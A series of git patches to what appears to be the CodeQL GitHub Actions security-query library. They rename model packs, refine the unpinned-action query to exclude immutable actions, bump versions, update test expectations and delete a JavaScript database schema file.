b/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/yumemi-inc/changed-files diff --git a/ql/lib/ext/manual/zaproxy_action-baseline.model.yml b/ql/lib/ext/manual/zaproxy_action-baseline.model.yml index 91df4767a72..309045ee58d 100644 --- a/ql/lib/ext/manual/zaproxy_action-baseline.model.yml +++ b/ql/lib/ext/manual/zaproxy_action-baseline.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml b/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml index 57f76c8cb4a..9da3749ebe4 100644 --- a/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml +++ b/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml b/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml index 1a40a634118..0cce7cc0cff 100644 --- a/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml +++ b/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["zentered/issue-forms-body-parser", "*", "input.body", "output.data", "taint", "manual"] From e8ee798ffaa5a7f303f6af7ffb0a5cb956932222 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 7 Nov 2024 15:29:28 -0500 Subject: [PATCH 0693/1267] add temporary immutable actions doc page --- ql/src/Security/CWE-829/UnversionedImmutableAction.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.md b/ql/src/Security/CWE-829/UnversionedImmutableAction.md index 754fe75b62b..33701ec27e6 100644 --- a/ql/src/Security/CWE-829/UnversionedImmutableAction.md +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.md @@ -7,7 +7,7 @@ of the action stored in the GitHub package registry. The action code will not ch ## Recommendations -When using [immutable actions]() use the full semantic version of the action. This will ensure that the action is resolved to the exact version stored in the GitHub package registry. This will prevent the action code from changing between runs. +When using [immutable actions](https://github.com/github/package-registry-team/blob/main/docs/immutable-actions/immutable-actions-howto.md) use the full semantic version of the action. This will ensure that the action is resolved to the exact version stored in the GitHub package registry. This will prevent the action code from changing between runs. ## Examples From d6e38d5e83e162955f24ba5db5c2f84a0bbd466d Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Fri, 8 Nov 2024 11:51:25 -0500 Subject: [PATCH 0694/1267] Do not detect immutable actions in UnpinnedActionsTag * these should be handles by the UseOfUnversionedImmutableAction.qll query instead * factor out immutableAction detection for reuse in both queries * octokit should not longer ping in UnpinnedActionsTag --- .../actions/security/UseOfUnversionedImmutableAction.qll | 8 ++++++-- ql/src/Security/CWE-829/UnpinnedActionsTag.md | 2 +- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 8 +++++--- .../Security/CWE-829/UnpinnedActionsTag.expected | 5 ----- 4 files changed, 12 insertions(+), 11 deletions(-) diff --git a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll index 2fd47e3f8e1..bd14b674920 100644 --- a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll +++ b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll @@ -4,8 +4,7 @@ class UnversionedImmutableAction extends UsesStep { string immutable_action; UnversionedImmutableAction() { - immutableActionsDataModel(immutable_action) and - this.getCallee() = immutable_action and + isImmutableAction(this, immutable_action) and not isSemVer(this.getVersion()) } } @@ -23,3 +22,8 @@ predicate isSemVer(string version) { // or latest which will work or version = "latest" } + +predicate isImmutableAction(UsesStep actionStep, string actionName) { + immutableActionsDataModel(actionName) and + actionStep.getCallee() = actionName +} diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.md b/ql/src/Security/CWE-829/UnpinnedActionsTag.md index eab708f8602..d7c114f0404 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.md +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.md @@ -6,7 +6,7 @@ Using a tag for a 3rd party Action that is not pinned to a commit can lead to ex ## Recommendations -Pinning an action to a full length commit SHA is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. +Pinning an action to a full length commit SHA is currently the only way to use a non-immutable action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. ## Examples diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index e0e668edfa8..de8d3c2078a 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -1,6 +1,6 @@ /** - * @name Unpinned tag for 3rd party Action in workflow - * @description Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. + * @name Unpinned tag for a non-immutable Action in workflow + * @description Using a tag for a non-immutable Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. * @kind problem * @security-severity 5.0 * @problem.severity recommendation @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.security.UseOfUnversionedImmutableAction bindingset[version] private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f0-9]{40}$") } @@ -32,7 +33,8 @@ where ) and uses.getVersion() = version and not isTrustedOrg(repo) and - not isPinnedCommit(version) + not isPinnedCommit(version) and + not isImmutableAction(uses, repo) select uses.getCalleeNode(), "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + "', not a pinned commit hash", uses, uses.toString() diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index aa19c08f2f0..848962e26bd 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -10,12 +10,7 @@ | .github/workflows/issue_comment_3rd_party_action.yml:14:15:14:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:27:15:27:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:41:15:41:42 | eficode/resolve-pr-refs@main | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | -| .github/workflows/issue_comment_octokit2.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit2.yml:20:15:20:43 | octokit/request-action@v2.x.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x.x', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | | .github/workflows/issue_comment_octokit2.yml:34:15:34:42 | some-action/some-repo@latest | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'some-action/some-repo' with ref 'latest', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:33:9:37:6 | Uses Step | Uses Step | -| .github/workflows/issue_comment_octokit.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit.yml:20:15:20:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | -| .github/workflows/issue_comment_octokit.yml:104:15:104:43 | octokit/request-action@v2.0.2 | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | | .github/workflows/label_trusted_checkout1.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout1.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout1.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout1.yml:24:13:24:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout1.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout1.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout2.yml:21:13:21:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout2.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout2.yml:21:7:25:4 | Uses Step | Uses Step | From 44fd14caaf023b055518ce7d1f11ce55db98d957 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 9 Nov 2024 10:40:04 +0100 Subject: [PATCH 0695/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a7df1c400bf..b72f94d1bb1 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.85 +version: 0.2.0 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 96ba9840785..a9f045567b0 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.85 +version: 0.2.0 groups: [actions, queries] suites: codeql-suites extractor: javascript From be8a49228f3de26952beece271a747bcbb62778c Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Wed, 13 Nov 2024 13:42:57 -0500 Subject: [PATCH 0696/1267] Delete dbscheme Update after merge --- ql/lib/ext/config/immutable_actions.yml | 2 +- ql/lib/semmlecode.javascript.dbscheme | 1190 - ql/lib/semmlecode.javascript.dbscheme.stats | 28248 ---------------- ql/test/codeql-pack.lock.yml | 22 +- .../UnnecessaryUseOfAdvancedConfig.actual | 1 - 5 files changed, 17 insertions(+), 29446 deletions(-) delete mode 100644 ql/lib/semmlecode.javascript.dbscheme delete mode 100644 ql/lib/semmlecode.javascript.dbscheme.stats delete mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual diff --git a/ql/lib/ext/config/immutable_actions.yml b/ql/lib/ext/config/immutable_actions.yml index 072e8ed0b09..d6a9b1020d7 100644 --- a/ql/lib/ext/config/immutable_actions.yml +++ b/ql/lib/ext/config/immutable_actions.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: immutableActionsDataModel data: - ["actions/checkout"] diff --git a/ql/lib/semmlecode.javascript.dbscheme b/ql/lib/semmlecode.javascript.dbscheme deleted file mode 100644 index c88c69174bd..00000000000 --- a/ql/lib/semmlecode.javascript.dbscheme +++ /dev/null @@ -1,1190 +0,0 @@ -/*** Standard fragments ***/ - -/*- Files and folders -*/ - -/** - * The location of an element. - * The location spans column `startcolumn` of line `startline` to - * column `endcolumn` of line `endline` in file `file`. - * For more information, see - * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). - */ -locations_default( - unique int id: @location_default, - int file: @file ref, - int beginLine: int ref, - int beginColumn: int ref, - int endLine: int ref, - int endColumn: int ref -); - -files( - unique int id: @file, - string name: string ref -); - -folders( - unique int id: @folder, - string name: string ref -); - -@container = @file | @folder - -containerparent( - int parent: @container ref, - unique int child: @container ref -); - -/*- Lines of code -*/ - -numlines( - int element_id: @sourceline ref, - int num_lines: int ref, - int num_code: int ref, - int num_comment: int ref -); - -/*- External data -*/ - -/** - * External data, loaded from CSV files during snapshot creation. See - * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) - * for more information. - */ -externalData( - int id : @externalDataElement, - string path : string ref, - int column: int ref, - string value : string ref -); - -/*- Source location prefix -*/ - -/** - * The source location of the snapshot. - */ -sourceLocationPrefix(string prefix : string ref); - -/*- JavaScript-specific part -*/ - -@location = @location_default - -@sourceline = @locatable; - -filetype( - int file: @file ref, - string filetype: string ref -) - -// top-level code fragments -toplevels (unique int id: @toplevel, - int kind: int ref); - -is_externs (int toplevel: @toplevel ref); - -case @toplevel.kind of - 0 = @script -| 1 = @inline_script -| 2 = @event_handler -| 3 = @javascript_url -| 4 = @template_toplevel; - -is_module (int tl: @toplevel ref); -is_nodejs (int tl: @toplevel ref); -is_es2015_module (int tl: @toplevel ref); -is_closure_module (int tl: @toplevel ref); - -@xml_node_with_code = @xmlelement | @xmlattribute | @template_placeholder_tag; -toplevel_parent_xml_node( - unique int toplevel: @toplevel ref, - int xmlnode: @xml_node_with_code ref); - -xml_element_parent_expression( - unique int xmlnode: @xmlelement ref, - int expression: @expr ref, - int index: int ref); - -// statements -#keyset[parent, idx] -stmts (unique int id: @stmt, - int kind: int ref, - int parent: @stmt_parent ref, - int idx: int ref, - varchar(900) tostring: string ref); - -stmt_containers (unique int stmt: @stmt ref, - int container: @stmt_container ref); - -jump_targets (unique int jump: @stmt ref, - int target: @stmt ref); - -@stmt_parent = @stmt | @toplevel | @function_expr | @arrow_function_expr | @static_initializer; -@stmt_container = @toplevel | @function | @namespace_declaration | @external_module_declaration | @global_augmentation_declaration; - -case @stmt.kind of - 0 = @empty_stmt -| 1 = @block_stmt -| 2 = @expr_stmt -| 3 = @if_stmt -| 4 = @labeled_stmt -| 5 = @break_stmt -| 6 = @continue_stmt -| 7 = @with_stmt -| 8 = @switch_stmt -| 9 = @return_stmt -| 10 = @throw_stmt -| 11 = @try_stmt -| 12 = @while_stmt -| 13 = @do_while_stmt -| 14 = @for_stmt -| 15 = @for_in_stmt -| 16 = @debugger_stmt -| 17 = @function_decl_stmt -| 18 = @var_decl_stmt -| 19 = @case -| 20 = @catch_clause -| 21 = @for_of_stmt -| 22 = @const_decl_stmt -| 23 = @let_stmt -| 24 = @legacy_let_stmt -| 25 = @for_each_stmt -| 26 = @class_decl_stmt -| 27 = @import_declaration -| 28 = @export_all_declaration -| 29 = @export_default_declaration -| 30 = @export_named_declaration -| 31 = @namespace_declaration -| 32 = @import_equals_declaration -| 33 = @export_assign_declaration -| 34 = @interface_declaration -| 35 = @type_alias_declaration -| 36 = @enum_declaration -| 37 = @external_module_declaration -| 38 = @export_as_namespace_declaration -| 39 = @global_augmentation_declaration -| 40 = @using_decl_stmt -; - -@decl_stmt = @var_decl_stmt | @const_decl_stmt | @let_stmt | @legacy_let_stmt | @using_decl_stmt; - -@export_declaration = @export_all_declaration | @export_default_declaration | @export_named_declaration; - -@namespace_definition = @namespace_declaration | @enum_declaration; -@type_definition = @class_definition | @interface_declaration | @enum_declaration | @type_alias_declaration | @enum_member; - -is_instantiated(unique int decl: @namespace_declaration ref); - -@declarable_node = @decl_stmt | @namespace_declaration | @class_decl_stmt | @function_decl_stmt | @enum_declaration | @external_module_declaration | @global_augmentation_declaration | @field; -has_declare_keyword(unique int stmt: @declarable_node ref); - -is_for_await_of(unique int forof: @for_of_stmt ref); - -// expressions -#keyset[parent, idx] -exprs (unique int id: @expr, - int kind: int ref, - int parent: @expr_parent ref, - int idx: int ref, - varchar(900) tostring: string ref); - -literals (varchar(900) value: string ref, - varchar(900) raw: string ref, - unique int expr: @expr_or_type ref); - -enclosing_stmt (unique int expr: @expr_or_type ref, - int stmt: @stmt ref); - -expr_containers (unique int expr: @expr_or_type ref, - int container: @stmt_container ref); - -array_size (unique int ae: @arraylike ref, - int sz: int ref); - -is_delegating (int yield: @yield_expr ref); - -@expr_or_stmt = @expr | @stmt; -@expr_or_type = @expr | @typeexpr; -@expr_parent = @expr_or_stmt | @property | @function_typeexpr; -@arraylike = @array_expr | @array_pattern; -@type_annotation = @typeexpr | @jsdoc_type_expr; -@node_in_stmt_container = @cfg_node | @type_annotation | @toplevel; - -case @expr.kind of - 0 = @label -| 1 = @null_literal -| 2 = @boolean_literal -| 3 = @number_literal -| 4 = @string_literal -| 5 = @regexp_literal -| 6 = @this_expr -| 7 = @array_expr -| 8 = @obj_expr -| 9 = @function_expr -| 10 = @seq_expr -| 11 = @conditional_expr -| 12 = @new_expr -| 13 = @call_expr -| 14 = @dot_expr -| 15 = @index_expr -| 16 = @neg_expr -| 17 = @plus_expr -| 18 = @log_not_expr -| 19 = @bit_not_expr -| 20 = @typeof_expr -| 21 = @void_expr -| 22 = @delete_expr -| 23 = @eq_expr -| 24 = @neq_expr -| 25 = @eqq_expr -| 26 = @neqq_expr -| 27 = @lt_expr -| 28 = @le_expr -| 29 = @gt_expr -| 30 = @ge_expr -| 31 = @lshift_expr -| 32 = @rshift_expr -| 33 = @urshift_expr -| 34 = @add_expr -| 35 = @sub_expr -| 36 = @mul_expr -| 37 = @div_expr -| 38 = @mod_expr -| 39 = @bitor_expr -| 40 = @xor_expr -| 41 = @bitand_expr -| 42 = @in_expr -| 43 = @instanceof_expr -| 44 = @logand_expr -| 45 = @logor_expr -| 47 = @assign_expr -| 48 = @assign_add_expr -| 49 = @assign_sub_expr -| 50 = @assign_mul_expr -| 51 = @assign_div_expr -| 52 = @assign_mod_expr -| 53 = @assign_lshift_expr -| 54 = @assign_rshift_expr -| 55 = @assign_urshift_expr -| 56 = @assign_or_expr -| 57 = @assign_xor_expr -| 58 = @assign_and_expr -| 59 = @preinc_expr -| 60 = @postinc_expr -| 61 = @predec_expr -| 62 = @postdec_expr -| 63 = @par_expr -| 64 = @var_declarator -| 65 = @arrow_function_expr -| 66 = @spread_element -| 67 = @array_pattern -| 68 = @object_pattern -| 69 = @yield_expr -| 70 = @tagged_template_expr -| 71 = @template_literal -| 72 = @template_element -| 73 = @array_comprehension_expr -| 74 = @generator_expr -| 75 = @for_in_comprehension_block -| 76 = @for_of_comprehension_block -| 77 = @legacy_letexpr -| 78 = @var_decl -| 79 = @proper_varaccess -| 80 = @class_expr -| 81 = @super_expr -| 82 = @newtarget_expr -| 83 = @named_import_specifier -| 84 = @import_default_specifier -| 85 = @import_namespace_specifier -| 86 = @named_export_specifier -| 87 = @exp_expr -| 88 = @assign_exp_expr -| 89 = @jsx_element -| 90 = @jsx_qualified_name -| 91 = @jsx_empty_expr -| 92 = @await_expr -| 93 = @function_sent_expr -| 94 = @decorator -| 95 = @export_default_specifier -| 96 = @export_namespace_specifier -| 97 = @bind_expr -| 98 = @external_module_reference -| 99 = @dynamic_import -| 100 = @expression_with_type_arguments -| 101 = @prefix_type_assertion -| 102 = @as_type_assertion -| 103 = @export_varaccess -| 104 = @decorator_list -| 105 = @non_null_assertion -| 106 = @bigint_literal -| 107 = @nullishcoalescing_expr -| 108 = @e4x_xml_anyname -| 109 = @e4x_xml_static_attribute_selector -| 110 = @e4x_xml_dynamic_attribute_selector -| 111 = @e4x_xml_filter_expression -| 112 = @e4x_xml_static_qualident -| 113 = @e4x_xml_dynamic_qualident -| 114 = @e4x_xml_dotdotexpr -| 115 = @import_meta_expr -| 116 = @assignlogandexpr -| 117 = @assignlogorexpr -| 118 = @assignnullishcoalescingexpr -| 119 = @template_pipe_ref -| 120 = @generated_code_expr -| 121 = @satisfies_expr -; - -@varaccess = @proper_varaccess | @export_varaccess; -@varref = @var_decl | @varaccess; - -@identifier = @label | @varref | @type_identifier; - -@literal = @null_literal | @boolean_literal | @number_literal | @string_literal | @regexp_literal | @bigint_literal; - -@propaccess = @dot_expr | @index_expr; - -@invokeexpr = @new_expr | @call_expr; - -@unaryexpr = @neg_expr | @plus_expr | @log_not_expr | @bit_not_expr | @typeof_expr | @void_expr | @delete_expr | @spread_element; - -@equality_test = @eq_expr | @neq_expr | @eqq_expr | @neqq_expr; - -@comparison = @equality_test | @lt_expr | @le_expr | @gt_expr | @ge_expr; - -@binaryexpr = @comparison | @lshift_expr | @rshift_expr | @urshift_expr | @add_expr | @sub_expr | @mul_expr | @div_expr | @mod_expr | @exp_expr | @bitor_expr | @xor_expr | @bitand_expr | @in_expr | @instanceof_expr | @logand_expr | @logor_expr | @nullishcoalescing_expr; - -@assignment = @assign_expr | @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr | @assign_mod_expr | @assign_exp_expr | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr | @assign_or_expr | @assign_xor_expr | @assign_and_expr | @assignlogandexpr | @assignlogorexpr | @assignnullishcoalescingexpr; - -@updateexpr = @preinc_expr | @postinc_expr | @predec_expr | @postdec_expr; - -@pattern = @varref | @array_pattern | @object_pattern; - -@comprehension_expr = @array_comprehension_expr | @generator_expr; - -@comprehension_block = @for_in_comprehension_block | @for_of_comprehension_block; - -@import_specifier = @named_import_specifier | @import_default_specifier | @import_namespace_specifier; - -@exportspecifier = @named_export_specifier | @export_default_specifier | @export_namespace_specifier; - -@type_keyword_operand = @import_declaration | @export_declaration | @import_specifier; - -@type_assertion = @as_type_assertion | @prefix_type_assertion; - -@class_definition = @class_decl_stmt | @class_expr; -@interface_definition = @interface_declaration | @interface_typeexpr; -@class_or_interface = @class_definition | @interface_definition; - -@lexical_decl = @var_decl | @type_decl; -@lexical_access = @varaccess | @local_type_access | @local_var_type_access | @local_namespace_access; -@lexical_ref = @lexical_decl | @lexical_access; - -@e4x_xml_attribute_selector = @e4x_xml_static_attribute_selector | @e4x_xml_dynamic_attribute_selector; -@e4x_xml_qualident = @e4x_xml_static_qualident | @e4x_xml_dynamic_qualident; - -expr_contains_template_tag_location( - int expr: @expr ref, - int location: @location ref -); - -@template_placeholder_tag_parent = @xmlelement | @xmlattribute | @file; - -template_placeholder_tag_info( - unique int node: @template_placeholder_tag, - int parentNode: @template_placeholder_tag_parent ref, - varchar(900) raw: string ref -); - -// scopes -scopes (unique int id: @scope, - int kind: int ref); - -case @scope.kind of - 0 = @global_scope -| 1 = @function_scope -| 2 = @catch_scope -| 3 = @module_scope -| 4 = @block_scope -| 5 = @for_scope -| 6 = @for_in_scope // for-of scopes work the same as for-in scopes -| 7 = @comprehension_block_scope -| 8 = @class_expr_scope -| 9 = @namespace_scope -| 10 = @class_decl_scope -| 11 = @interface_scope -| 12 = @type_alias_scope -| 13 = @mapped_type_scope -| 14 = @enum_scope -| 15 = @external_module_scope -| 16 = @conditional_type_scope; - -scopenodes (unique int node: @ast_node ref, - int scope: @scope ref); - -scopenesting (unique int inner: @scope ref, - int outer: @scope ref); - -// functions -@function = @function_decl_stmt | @function_expr | @arrow_function_expr; - -@parameterized = @function | @catch_clause; -@type_parameterized = @function | @class_or_interface | @type_alias_declaration | @mapped_typeexpr | @infer_typeexpr; - -is_generator (int fun: @function ref); -has_rest_parameter (int fun: @function ref); -is_async (int fun: @function ref); - -// variables and lexically scoped type names -#keyset[scope, name] -variables (unique int id: @variable, - varchar(900) name: string ref, - int scope: @scope ref); - -#keyset[scope, name] -local_type_names (unique int id: @local_type_name, - varchar(900) name: string ref, - int scope: @scope ref); - -#keyset[scope, name] -local_namespace_names (unique int id: @local_namespace_name, - varchar(900) name: string ref, - int scope: @scope ref); - -is_arguments_object (int id: @variable ref); - -@lexical_name = @variable | @local_type_name | @local_namespace_name; - -@bind_id = @varaccess | @local_var_type_access; -bind (unique int id: @bind_id ref, - int decl: @variable ref); - -decl (unique int id: @var_decl ref, - int decl: @variable ref); - -@typebind_id = @local_type_access | @export_varaccess; -typebind (unique int id: @typebind_id ref, - int decl: @local_type_name ref); - -@typedecl_id = @type_decl | @var_decl; -typedecl (unique int id: @typedecl_id ref, - int decl: @local_type_name ref); - -namespacedecl (unique int id: @var_decl ref, - int decl: @local_namespace_name ref); - -@namespacebind_id = @local_namespace_access | @export_varaccess; -namespacebind (unique int id: @namespacebind_id ref, - int decl: @local_namespace_name ref); - - -// properties in object literals, property patterns in object patterns, and method declarations in classes -#keyset[parent, index] -properties (unique int id: @property, - int parent: @property_parent ref, - int index: int ref, - int kind: int ref, - varchar(900) tostring: string ref); - -case @property.kind of - 0 = @value_property -| 1 = @property_getter -| 2 = @property_setter -| 3 = @jsx_attribute -| 4 = @function_call_signature -| 5 = @constructor_call_signature -| 6 = @index_signature -| 7 = @enum_member -| 8 = @proper_field -| 9 = @parameter_field -| 10 = @static_initializer -; - -@property_parent = @obj_expr | @object_pattern | @class_definition | @jsx_element | @interface_definition | @enum_declaration; -@property_accessor = @property_getter | @property_setter; -@call_signature = @function_call_signature | @constructor_call_signature; -@field = @proper_field | @parameter_field; -@field_or_vardeclarator = @field | @var_declarator; - -is_computed (int id: @property ref); -is_method (int id: @property ref); -is_static (int id: @property ref); -is_abstract_member (int id: @property ref); -is_const_enum (int id: @enum_declaration ref); -is_abstract_class (int id: @class_decl_stmt ref); - -has_public_keyword (int id: @property ref); -has_private_keyword (int id: @property ref); -has_protected_keyword (int id: @property ref); -has_readonly_keyword (int id: @property ref); -has_type_keyword (int id: @type_keyword_operand ref); -is_optional_member (int id: @property ref); -has_definite_assignment_assertion (int id: @field_or_vardeclarator ref); -is_optional_parameter_declaration (unique int parameter: @pattern ref); - -#keyset[constructor, param_index] -parameter_fields( - unique int field: @parameter_field ref, - int constructor: @function_expr ref, - int param_index: int ref -); - -// types -#keyset[parent, idx] -typeexprs ( - unique int id: @typeexpr, - int kind: int ref, - int parent: @typeexpr_parent ref, - int idx: int ref, - varchar(900) tostring: string ref -); - -case @typeexpr.kind of - 0 = @local_type_access -| 1 = @type_decl -| 2 = @keyword_typeexpr -| 3 = @string_literal_typeexpr -| 4 = @number_literal_typeexpr -| 5 = @boolean_literal_typeexpr -| 6 = @array_typeexpr -| 7 = @union_typeexpr -| 8 = @indexed_access_typeexpr -| 9 = @intersection_typeexpr -| 10 = @parenthesized_typeexpr -| 11 = @tuple_typeexpr -| 12 = @keyof_typeexpr -| 13 = @qualified_type_access -| 14 = @generic_typeexpr -| 15 = @type_label -| 16 = @typeof_typeexpr -| 17 = @local_var_type_access -| 18 = @qualified_var_type_access -| 19 = @this_var_type_access -| 20 = @predicate_typeexpr -| 21 = @interface_typeexpr -| 22 = @type_parameter -| 23 = @plain_function_typeexpr -| 24 = @constructor_typeexpr -| 25 = @local_namespace_access -| 26 = @qualified_namespace_access -| 27 = @mapped_typeexpr -| 28 = @conditional_typeexpr -| 29 = @infer_typeexpr -| 30 = @import_type_access -| 31 = @import_namespace_access -| 32 = @import_var_type_access -| 33 = @optional_typeexpr -| 34 = @rest_typeexpr -| 35 = @bigint_literal_typeexpr -| 36 = @readonly_typeexpr -| 37 = @template_literal_typeexpr -; - -@typeref = @typeaccess | @type_decl; -@type_identifier = @type_decl | @local_type_access | @type_label | @local_var_type_access | @local_namespace_access; -@typeexpr_parent = @expr | @stmt | @property | @typeexpr; -@literal_typeexpr = @string_literal_typeexpr | @number_literal_typeexpr | @boolean_literal_typeexpr | @bigint_literal_typeexpr; -@typeaccess = @local_type_access | @qualified_type_access | @import_type_access; -@vartypeaccess = @local_var_type_access | @qualified_var_type_access | @this_var_type_access | @import_var_type_access; -@namespace_access = @local_namespace_access | @qualified_namespace_access | @import_namespace_access; -@import_typeexpr = @import_type_access | @import_namespace_access | @import_var_type_access; - -@function_typeexpr = @plain_function_typeexpr | @constructor_typeexpr; - -// types -types ( - unique int id: @type, - int kind: int ref, - varchar(900) tostring: string ref -); - -#keyset[parent, idx] -type_child ( - int child: @type ref, - int parent: @type ref, - int idx: int ref -); - -case @type.kind of - 0 = @any_type -| 1 = @string_type -| 2 = @number_type -| 3 = @union_type -| 4 = @true_type -| 5 = @false_type 